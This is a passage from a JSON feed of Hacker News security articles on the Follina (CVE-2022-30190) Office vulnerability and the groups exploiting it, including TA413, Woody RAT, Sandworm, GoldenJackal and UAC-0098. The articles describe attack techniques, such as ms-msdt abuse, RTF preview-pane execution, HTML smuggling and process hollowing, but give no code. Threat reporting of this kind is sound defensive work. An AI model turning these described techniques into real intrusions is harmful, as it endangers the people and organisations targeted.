code execution on affected systems.\n\n\"TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using URLs to deliver ZIP archives which contain Word Documents that use the technique,\" enterprise security firm Proofpoint [said](<https://twitter.com/threatinsight/status/1531688214993555457>) in a tweet.\n\n\"Campaigns impersonate the 'Women Empowerments Desk' of the Central Tibetan Administration and use the domain tibet-gov.web[.]app.\"\n\n[TA413](<https://malpedia.caad.fkie.fraunhofer.de/actor/ta413>) is best known for its campaigns aimed at the Tibetan diaspora to deliver implants such as [Exile RAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.exilerat>) and [Sepulcher](<https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher>) as well as a rogue Firefox browser extension dubbed [FriarFox](<https://thehackernews.com/2021/02/chinese-hackers-using-firefox-extension.html>).\n\nThe high-severity security flaw, dubbed Follina and tracked as CVE-2022-30190 (CVSS score: 7.8), relates to a case of remote code execution that abuses the \"ms-msdt:\" protocol URI scheme to execute arbitrary code.\n\nSpecifically, the attack makes it possible for threat actors to circumvent [Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) safeguards for suspicious files by simply changing the document to a Rich Text Format (RTF) file, thereby allowing the injected code to be run without even opening the document via the [Preview Pane](<https://docs.microsoft.com/en-us/windows/powertoys/file-explorer>) in Windows File Explorer.\n\nWhile the bug gained widespread attention last week, evidence points to active exploitation of the diagnostic tool flaw in real-world attacks targeting Russian users over a month ago on April 12, 2022, when it was disclosed to Microsoft.\n\nThe company, however, [did not deem it a security issue](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) and closed the vulnerability submission report, citing reasons that the MSDT utility requires a [passkey](<https://social.technet.microsoft.com/wiki/contents/articles/30458.windows-10-ctp-how-to-run-microsoft-support-diagnostic-tool.aspx#How_shall_I_get_the_Passkey>) provided by a support technician before it can execute payloads.\n\nThe vulnerability exists in all currently supported Windows versions and can be exploited via Microsoft Office versions Office 2013 through Office 21 and Office Professional Plus editions.\n\n\"This elegant attack is designed to bypass security products and fly under the radar by leveraging Microsoft Office's remote template feature and the ms-msdt protocol to execute malicious code, all without the need for macros,\" Malwarebytes' Jerome Segura [noted](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>).\n\nAlthough there is no official patch available at this point, Microsoft has [recommended](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) disabling the MSDT URL protocol to prevent the attack vector. Additionally, it's been [advised](<https://twitter.com/wdormann/status/1531259406624620544>) to turn off the Preview Pane in File Explorer.\n\n\"What makes 'Follina' stand out is that this exploit does not take advantage of Office macros and, therefore, it works even in environments where macros have been disabled entirely,\" Nikolas Cemerikic of Immersive Labs said.\n\n\"All that's required for the exploit to take effect is for a user to open and view the Word document, or to view a preview of the document using the Windows Explorer Preview Pane. Since the latter does not require Word to launch fully, this effectively becomes a zero-click attack.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-06-01T06:02:00", "type": "thn", "title": "Chinese Hackers Begin Exploiting Latest Microsoft Office Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T10:00:06", "id": "THN:D9A5562FBD56B3B0FF85376C9BCF0A10", "href": "https://thehackernews.com/2022/05/chinese-hackers-begin-exploiting-latest.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-05T05:59:49", "description": "[![Woody RAT Malware](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEijZhKuLa-lQHOTya-LumppJRRe0-K5ZkrokQP6YCJulItM735L7x2VxidGSY3UAUweDYOrlUCjOSZOqKHcBnPJbUkrWJp74sfTiaR4x0D78nMuUhWticD0LtHFKvf1LGsYs6Cb9YnIJTJZwZygzO7MpLe49vP_YZwGnsgl_Jl9cnJRwT5-2Ahq8hf0/s728-e1000/rat.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEijZhKuLa-lQHOTya-LumppJRRe0-K5ZkrokQP6YCJulItM735L7x2VxidGSY3UAUweDYOrlUCjOSZOqKHcBnPJbUkrWJp74sfTiaR4x0D78nMuUhWticD0LtHFKvf1LGsYs6Cb9YnIJTJZwZygzO7MpLe49vP_YZwGnsgl_Jl9cnJRwT5-2Ahq8hf0/s728-e100/rat.jpg>)\n\nAn unknown threat actor has been targeting Russian entities with a newly discovered remote access trojan called **Woody RAT** for at least a year as part of a spear-phishing campaign.\n\nThe advanced custom backdoor is said to be delivered via either of two methods: archive files or Microsoft Office documents leveraging the now-patched \"Follina\" support diagnostic tool vulnerability ([CVE-2022-30190](<https://thehackernews.com/2022/07/hackers-exploiting-follina-bug-to.html>)) in Windows.\n\nLike other implants engineered for espionage-oriented operations, Woody RAT sports a wide range of features that enables the threat actor to remotely commandeer and steal sensitive information from the infected systems.\n\n\"The earliest versions of this RAT were typically archived into a ZIP file pretending to be a document specific to a Russian group,\" Malwarebytes researchers Ankur Saini and Hossein Jazi [said](<https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/>) in a Wednesday report.\n\n\"When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload.\"\n\nIn one instance, the hacking group attempted to strike a Russian aerospace and defense entity known as [OAK](<https://www.uacrussia.ru/en/>) based on evidence gleaned from a fake domain registered for this purpose.\n\n[![Woody RAT Malware](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg35LRJ0ayqjEMKo3ADOi7mLoAyI4moDW82GmOQ2AlRyBAr__ZIQMM7vFfzy16TW4_PJDRxTM3MyD7ds52s6eT0XLADE2Hz4UwUUa1dTPqwH82imY_KTeVPstKV8SaH6cUZFOFhzy9sDGaIgyuV67nCpgMjWxG3zJtHwhSLCWzu8TEc3yxib37k2VDO/s728-e1000/malware.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg35LRJ0ayqjEMKo3ADOi7mLoAyI4moDW82GmOQ2AlRyBAr__ZIQMM7vFfzy16TW4_PJDRxTM3MyD7ds52s6eT0XLADE2Hz4UwUUa1dTPqwH82imY_KTeVPstKV8SaH6cUZFOFhzy9sDGaIgyuV67nCpgMjWxG3zJtHwhSLCWzu8TEc3yxib37k2VDO/s728-e100/malware.jpg>)\n\nAttacks leveraging the Windows flaw as part of this campaign first came to light on June 7, 2022, when researchers from the MalwareHunterTeam [disclosed](<https://twitter.com/malwrhunterteam/status/1534184385313923072>) the use of a document named \"\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx\" (which translates to \"Memo.docx\") to deliver a CSS payload containing the trojan.\n\nThe document purportedly offers best security practices for passwords and confidential information, among others, while acting as a decoy for dropping the backdoor.\n\nBesides encrypting its communications with a remote server, Woody RAT is equipped with capabilities to write arbitrary files to the machine, execute additional malware, delete files, enumerate directories, capture screenshots, and gather a list of running processes.\n\nAlso embedded within the malware are two .NET-based libraries named WoodySharpExecutor and WoodyPowerSession that can be used to run .NET code and PowerShell commands received from the server, respectively.\n\nFurthermore, the malware makes use of the [process hollowing technique](<https://attack.mitre.org/techniques/T1055/012/>) to inject itself into a suspended Notepad process and deletes itself from the disk to evade detection from security software installed on the compromised host.\n\nMalwarebytes has yet to attribute the attacks to a specific threat actor, citing lack of solid indicators linking the campaign to a previously known group, although Chinese and North Korean nation-state collectives have targeted Russia in the past.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-04T12:55:00", "type": "thn", "title": "New Woody RAT Malware Being Used to Target Russian Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-05T05:42:05", "id": "THN:DFB68B1B6C2EFBB410EB54D83320B71C", "href": "https://thehackernews.com/2022/08/new-woody-rat-malware-being-used-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-22T06:04:11", "description": "[![Russian Sandworm Hackers](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgn45Ck6vqDFvA2leDePKdPhlDH1ahczKEX1G7NW9CKxteJGkz3l_Dxpmjd1SnrDkHKguss5We9LWuDgnHlJuns2KL7DwAsl-xMBxv1S1VLDsBEjacQCutkUNEQVeTllKkGd_8PyVCTLk6MOVTWU_e_tEHf4dzp7n647bD1HgoUG5tWMG9ax-DFlaWb/s728-e1000/russian-hackers.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgn45Ck6vqDFvA2leDePKdPhlDH1ahczKEX1G7NW9CKxteJGkz3l_Dxpmjd1SnrDkHKguss5We9LWuDgnHlJuns2KL7DwAsl-xMBxv1S1VLDsBEjacQCutkUNEQVeTllKkGd_8PyVCTLk6MOVTWU_e_tEHf4dzp7n647bD1HgoUG5tWMG9ax-DFlaWb/s728-e100/russian-hackers.jpg>)\n\nA threat cluster linked to the Russian nation-state actor tracked as Sandworm has continued its targeting of Ukraine with commodity malware by masquerading as telecom providers, new findings show.\n\nRecorded Future said it discovered new infrastructure belonging to UAC-0113 that mimics operators like Datagroup and EuroTransTelecom to deliver payloads such as [Colibri loader](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) and [Warzone RAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria>).\n\nThe attacks are said to be an expansion of the [same campaign](<https://cert.gov.ua/article/405538>) that previously distributed [DCRat](<https://thehackernews.com/2022/05/experts-sound-alarm-on-dcrat-backdoor.html>) (or DarkCrystal RAT) using phishing emails with legal aid-themed lures against providers of telecommunications in Ukraine.\n\nSandworm is a [destructive Russian threat group](<https://thehackernews.com/2020/10/russian-hackers.html>) that's best known for carrying out attacks such as the 2015 and 2016 targeting of Ukrainian electrical grid and 2017's NotPetya attacks. It's confirmed to be Unit 74455 of Russia's GRU military intelligence agency.\n\nThe adversarial collective, also known as Voodoo Bear, sought to damage high-voltage electrical substations, computers and networking equipment for the third time in Ukraine earlier this April through a [new variant of a piece of malware](<https://thehackernews.com/2022/04/russian-hackers-tried-attacking.html>) known as Industroyer.\n\n[![Ukrainian Telecoms](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjXC-uZjCaOE_yV1Ns_wdImLvY7yyJYACWqNQeg20fPXqv5CKuqxWQe7J6SuIaEJEfGFj1kYATlPbZUZfu1WcJ3BKgFQldFDoa_8Ak0IbRePTyHl5roYnEv5BqaJPBWNSFWwm2IRfiLxEPXIK6b1T9KLchmrOrOYDES07WewyUwSgVt1Ma91-35cy2g/s728-e1000/link.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjXC-uZjCaOE_yV1Ns_wdImLvY7yyJYACWqNQeg20fPXqv5CKuqxWQe7J6SuIaEJEfGFj1kYATlPbZUZfu1WcJ3BKgFQldFDoa_8Ak0IbRePTyHl5roYnEv5BqaJPBWNSFWwm2IRfiLxEPXIK6b1T9KLchmrOrOYDES07WewyUwSgVt1Ma91-35cy2g/s728-e100/link.jpg>)\n\nRussia's invasion of Ukraine has also had the group unleash numerous other attacks, including [leveraging the Follina vulnerability](<https://thehackernews.com/2022/07/russian-hackers-tricked-ukrainians-with.html>) (CVE-2022-30190) in the Microsoft Windows Support Diagnostic Tool (MSDT) to breach media entities in the Eastern European nation.\n\nIn addition, it was uncovered as the mastermind behind a new modular botnet called [Cyclops Blink](<https://thehackernews.com/2022/04/fbi-shut-down-russia-linked-cyclops.html>) that enslaved internet-connected firewall devices and routers from WatchGuard and ASUS.\n\nThe U.S. government, for its part, has announced up to [$10 million in rewards](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) for information on six hackers associated with the APT group for participating in malicious cyber activities against critical infrastructure in the country.\n\n[![Russian Sandworm Hackers](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhqC088Qg7YBtg3UXFBJalDCP6mVfxKfvjY5yNkkSnaAzijWLnHr-5hw8ZRAGsRo2kw_2ahBrMMxkklXzZZWQwTk1RdkJ62o6UmJjDK99d2kflQJO76hiDcGt0eVnK9HwdB4v6gYy3p6HhbHfT-i8shyoNIyTsvC0moN0M6dNQGjqFBw-pTH9Rg6yvA/s728-e1000/hack.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhqC088Qg7YBtg3UXFBJalDCP6mVfxKfvjY5yNkkSnaAzijWLnHr-5hw8ZRAGsRo2kw_2ahBrMMxkklXzZZWQwTk1RdkJ62o6UmJjDK99d2kflQJO76hiDcGt0eVnK9HwdB4v6gYy3p6HhbHfT-i8shyoNIyTsvC0moN0M6dNQGjqFBw-pTH9Rg6yvA/s728-e100/hack.jpg>)\n\n\"A transition from DarkCrystal RAT to Colibri Loader and Warzone RAT demonstrates UAC-0113's broadening but continuing use of publicly available commodity malware,\" Recorded Future [said](<https://www.recordedfuture.com/russia-nexus-uac-0113-emulating-telecommunication-providers-in-ukraine>).\n\nThe attacks entail the fraudulent domains hosting a web page purportedly about \"Odesa Regional Military Administration,\" while an encoded ISO image payload is stealthily deployed via a technique referred to as [HTML smuggling](<https://thehackernews.com/2021/11/hackers-increasingly-using-html.html>).\n\nHTML smuggling, as the name goes, is an evasive malware delivery technique that leverages legitimate HTML and JavaScript features to distribute malware and get around conventional security controls.\n\nRecorded Future also said it identified points of similarities with another [HTML dropper attachment](<https://thehackernews.com/2022/07/russian-hackers-using-dropbox-and.html>) put to use by the APT29 threat actor in a campaign aimed at Western diplomatic missions between May and June 2022.\n\nEmbedded within the ISO file, which was created on August 5, 2022, are three files, including an LNK file that tricks the victim into activating the infection sequence, resulting in the deployment of both Colibri loader and Warzone RAT to the target machine.\n\nThe execution of the LNK file also launches an innocuous decoy document \u2013 an application for Ukrainian citizens to request for monetary compensation and fuel discounts \u2013 in an attempt to conceal the malicious operations.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-20T12:56:00", "type": "thn", "title": "Russian Sandworm Hackers Impersonate Ukrainian Telecoms to Distribute Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-22T06:02:31", "id": "THN:FB2F303221B7A65E2CFAC245F0DD0B47", "href": "https://thehackernews.com/2022/09/russian-sandworm-hackers-impersonate.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-24T10:20:50", "description": "[![GoldenJackal Threat Group](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjKx6lnebkMoVxrD6i2a9kHJMAK5StxF6UxajtGC-QKg5H7keNnKCBTpf-Bd8WwGeUEEfMG2Ggx08MrkhJWyUl22L9HcF5u4bQjfUVvL0VUOr0pFg3D_XL31sY-zLG7VDiFGPVTewvqYAqdOJK9m6gUKqO6V3YHg5ylRQkhbSZxgEioqOxwvUsuvejm/s728-e365/hackers.jpg>)\n\nGovernment and diplomatic entities in the Middle East and South Asia are the target of a new advanced persistent threat actor named **GoldenJackal**.\n\nRussian cybersecurity firm Kaspersky, which has been [keeping tabs](<https://securelist.com/goldenjackal-apt-group/109677/>) on the group's activities since mid-2020, characterized the adversary as both capable and stealthy.\n\nThe targeting scope of the campaign is focused on Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey, infecting victims with tailored malware that steals data, propagates across systems via removable drives, and conducts surveillance.\n\nGoldenJackal is suspected to have been active for at least four years, although little is known about the group. Kaspersky said it has been unable to determine its origin or affiliation with known threat actors, but the actor's modus operandi suggests an espionage motivation.\n\nWhat's more, the threat actor's attempts to maintain a low profile and disappear into the shadows bears all the hallmarks of a state-sponsored group.\n\nThat said, some tactical overlaps have been observed between the threat actor and [Turla](<https://thehackernews.com/2023/05/us-government-neutralizes-russias-most.html>), one of Russia's [elite nation-state hacking crews](<https://www.wired.com/story/turla-history-russia-fsb-hackers/>). In one instance, a victim machine was infected by Turla and GoldenJackal two months apart.\n\nThe exact initial path employed to breach targeted computers is unknown at this stage, but evidence gathered so far points to the use of trojanized Skype installers and malicious Microsoft Word documents.\n\nWhile the installer serves as a conduit to deliver a .NET-based trojan called JackalControl, the Word files have been observed weaponizing the [Follina vulnerability](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>) ([CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>)) to drop the same malware.\n\nJackalControl, as the name indicates, enables the attackers to remotely commandeer the machine, execute arbitrary commands, as well as upload and download from and to the system.\n\n[![Geography of victims](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhX4xXiopFD7kY0eMtwKUzmwJ9yEJOldW4unujyer5BqYZeccOBwGgencFn_P38MZTiYFquMCRF-Tq9hIhEX_z6Bx9TsPJeRsdYa-u1HfL4Zg61fkA2fhI9LUcVFR15RcFLUjeJ8LaLYUwCemRwCs3NNZd2s0vIxG8CfsS2UKdhaI06y7bRDpciT7mE/s728-e365/map.jpg>) \n--- \nGeography of victims \n \nSome of the other malware families deployed by GoldenJackal are as follows -\n\n * **JackalSteal** \\- An implant that's used to find files of interest, including those located in removable USB drives, and transmit them to a remote server.\n * **JackalWorm** \\- A worm that's engineered to infect systems using removable USB drives and install the JackalControl trojan.\n * **JackalPerInfo** \\- A malware that comes with features to harvest system metadata, folder contents, installed applications, and running processes, and credentials stored in web browser databases.\n * **JackalScreenWatcher** \\- A utility to grab screenshots based on a preset time interval and send them to an actor-controlled server.\n\nAnother notable aspect of the threat actor is its reliance on hacked WordPress sites as a relay to forward web requests to the actual command-and-control (C2) server by means of a rogue PHP file injected into the websites.\n\n\"The group is probably trying to reduce its visibility by limiting the number of victims,\" Kaspersky researcher Giampaolo Dedola said. \"Their toolkit seems to be under development \u2013 the number of variants shows that they are still investing in it.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-23T15:30:00", "type": "thn", "title": "GoldenJackal: New Threat Group Targeting Middle Eastern and South Asian Governments", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-05-24T06:25:07", "id": "THN:1B983787EB2BA5D0757F1F83458B7ABE", "href": "https://thehackernews.com/2023/05/goldenjackal-new-threat-group-targeting.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-14T16:23:01", "description": "[![Financially Motivated Attacks](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgNo0JIZZ2xVs6xWtBDjG87OxZhnIm24TPPfBsB4b1eUH3h75A9m5-rMQtbJNUn997mhuZ9FVOeso_N8_mbXm7xPWkdN_VN9xEC-jz_XOOnSKdgBn0U32ePvsu7MkJ99eVXjBZrFnXBotJEoO7vu7eUykxbIFN-6PnFuHXb16ZuNxWHY26VBO19rhGB/s728-e1000/russian-hackers.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgNo0JIZZ2xVs6xWtBDjG87OxZhnIm24TPPfBsB4b1eUH3h75A9m5-rMQtbJNUn997mhuZ9FVOeso_N8_mbXm7xPWkdN_VN9xEC-jz_XOOnSKdgBn0U32ePvsu7MkJ99eVXjBZrFnXBotJEoO7vu7eUykxbIFN-6PnFuHXb16ZuNxWHY26VBO19rhGB/s728-e100/russian-hackers.jpg>)\n\nFormer members of the Conti cybercrime cartel have been implicated in five different campaigns targeting Ukraine from April to August 2022.\n\nThe findings, which come from Google's Threat Analysis Group (TAG), builds upon a [prior report](<https://thehackernews.com/2022/07/russian-hackers-tricked-ukrainians-with.html>) published in July 2022 detailing the [continued cyber activity](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/>) aimed at the Eastern European nation amid the ongoing Russo-Ukrainian war.\n\n\"UAC-0098 is a threat actor that historically delivered the [IcedID banking trojan](<https://thehackernews.com/2022/03/hackers-hijack-email-reply-chains-on.html>), leading to human-operated ransomware attacks,\" TAG researcher Pierre-Marc Bureau [said](<https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/>) in a report shared with The Hacker News.\n\n\"The attacker has recently shifted their focus to targeting Ukrainian organizations, the Ukrainian government, and European humanitarian and non-profit organizations.\"\n\nUAC-0098 is believed to have functioned as an initial access broker for ransomware groups such as Quantum and [Conti](<https://thehackernews.com/2022/04/gold-ulrick-hackers-still-in-action.html>) (aka FIN12, Gold Ulrick, or Wizard Spider), the former of which was [subsumed by the latter](<https://thehackernews.com/2022/08/conti-cybercrime-cartel-using-bazarcall.html>) in April 2022.\n\n[![Financially Motivated Attacks](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwAToWSwhUxNkqZBnap1saOcSptSsRKdR2PCuiQamQfKMMtK9-B7ynmiF-gdlmDCOj8RDPb54wYwMRwiIXBFKTwDGotN-y7Rlc4SLlXv-jQUmbV7_4igIalD1e_sKbpjs6ZZYEUwsTet-4KSgvQpaxTA0AqjnN7-DuVbePjhJNOznNM8ypuas5E4_D/s728-e1000/google-malware.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwAToWSwhUxNkqZBnap1saOcSptSsRKdR2PCuiQamQfKMMtK9-B7ynmiF-gdlmDCOj8RDPb54wYwMRwiIXBFKTwDGotN-y7Rlc4SLlXv-jQUmbV7_4igIalD1e_sKbpjs6ZZYEUwsTet-4KSgvQpaxTA0AqjnN7-DuVbePjhJNOznNM8ypuas5E4_D/s728-e100/google-malware.jpg>)\n\nOne of the prominent campaigns undertaken by the group in June 2022 entailed the abuse of [Follina vulnerability](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>) (CVE-2022-30190) in the Windows operating system to deploy CrescentImp and Cobalt Strike Beacons on to targeted hosts in media and critical infrastructure entities.\n\nBut this appears to be a part of a series of attacks that commenced way back in late April 2022, when the group conducted an email phishing campaign to deliver [AnchorMail](<https://thehackernews.com/2022/03/trickbot-malware-gang-upgrades-its.html>) (aka LackeyBuilder), a variant of the TrickBot group's AnchorDNS implant that uses SMTP for command-and-control.\n\nSubsequent phishing campaigns distributing IcedID and Cobalt Strike have been directed against Ukrainian organizations, repeatedly striking the hospitality sector, some of which impersonated the National Cyber Police of Ukraine or representatives of Elon Musk and StarLink.\n\nAround mid-May, UAC-0098 is also said to have leveraged a compromised account of a hotel in India to send malware-laced attachments to organizations working in the hospitality industry in Ukraine, before expanding to humanitarian NGOs in Italy.\n\nSimilar attacks have also been observed against entities in the technology, retail, and government sectors, with the IcedID binary concealed as a Microsoft update to trigger the infection. Post-exploitation steps carried out following a successful compromise have not been identified.\n\nUAC-0098 is far from the only Conti-affiliated hacking group to set its sights on Ukraine since the onset of the war. In July 2022, IBM Security X-Force [disclosed](<https://thehackernews.com/2022/07/trickbot-malware-shifted-its-focus-on.html>) that the TrickBot gang orchestrated six different campaigns to systematically target the country with a plethora of malware.\n\n\"UAC-0098 activities are representative examples of blurring lines between financially motivated and government backed groups in Eastern Europe, illustrating a trend of threat actors changing their targeting to align with regional geopolitical interests,\" Bureau said.\n\n\"The group demonstrates strong interest in breaching businesses operating in the hospitality industry of Ukraine, going as far as launching multiple distinct campaigns against the same hotel chains.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-07T14:42:00", "type": "thn", "title": "Some Members of Conti Group Targeting Ukraine in Financially Motivated Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-14T13:52:54", "id": "THN:8C7C0BBCE90D4B2076F46E011BAB609D", "href": "https://thehackernews.com/2022/09/some-members-of-conti-group-targeting.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-12T03:58:26", "description": "[![Rozena 